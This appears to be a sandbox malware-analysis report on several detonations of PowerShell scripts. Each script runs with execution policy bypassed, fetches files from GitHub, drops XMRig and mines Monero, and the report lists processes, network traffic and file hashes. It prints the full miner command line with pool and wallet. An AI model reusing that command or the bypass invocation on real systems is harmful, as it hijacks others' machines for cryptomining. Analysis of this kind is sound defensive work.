"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/2776-3-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/2776-5-0x00000129E0F10000-0x00000129E0F32000-memory.dmp
memory/2776-9-0x00000129F9580000-0x00000129F95F6000-memory.dmp
memory/2776-8-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-10-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eam5ksse.tm3.ps1 (AppLocker/WDAC policy-test file written by powershell.exe itself at startup, not a file dropped by the sample; the hashes below are those of the one-byte content "1" and are not indicators)
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2776-25-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-29-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-30-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-31-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-51-0x00000129F9310000-0x00000129F9322000-memory.dmp
memory/2776-64-0x00000129E0F70000-0x00000129E0F7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3540-93-0x000001FB09D10000-0x000001FB09D30000-memory.dmp
memory/3540-94-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-95-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-96-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-97-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-98-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-99-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-100-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-101-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-102-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-103-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-104-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-105-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-106-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-107-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-108-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-109-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-110-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-111-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-112-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-113-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-114-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-115-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-116-0x00007FF613620000-0x00007FF614253000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
293s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3084 wrote to memory of 3652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3084 wrote to memory of 3652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3084-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okzljvc3.hpn.ps1 (AppLocker/WDAC policy-test file written by powershell.exe itself at startup, not a file dropped by the sample; its hashes are not indicators)
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3084-9-0x000001C3F2570000-0x000001C3F2592000-memory.dmp
memory/3084-10-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-11-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-12-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-13-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
memory/3084-14-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-15-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-16-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/3084-18-0x000001C3F2600000-0x000001C3F2612000-memory.dmp
memory/3084-19-0x000001C3F25E0000-0x000001C3F25EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3652-50-0x000001F4B3460000-0x000001F4B3480000-memory.dmp
memory/3652-51-0x000001F4B34B0000-0x000001F4B34D0000-memory.dmp
memory/3652-52-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-53-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-55-0x000001F4B4C90000-0x000001F4B4CB0000-memory.dmp
memory/3652-54-0x000001F4B4CB0000-0x000001F4B4CD0000-memory.dmp
memory/3652-56-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-57-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-59-0x000001F4B4C90000-0x000001F4B4CB0000-memory.dmp
memory/3652-58-0x000001F4B4CB0000-0x000001F4B4CD0000-memory.dmp
memory/3652-60-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-61-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-62-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-63-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-64-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-65-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-66-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-67-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-68-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-69-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-70-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-71-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-72-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-73-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-74-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-75-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-76-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-77-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-78-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-79-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-80-0x00007FF66F900000-0x00007FF670533000-memory.dmp
memory/3652-81-0x00007FF66F900000-0x00007FF670533000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
266s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2428 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnteucum.2gy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
299s
Max time network
275s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1432 wrote to memory of 4144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1432 wrote to memory of 4144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gginggxx.sqr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
203s
Max time network
307s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_10pzlg4q.tbh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4632 wrote to memory of 4736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4632 wrote to memory of 4736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_15ozgwiz.ley.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
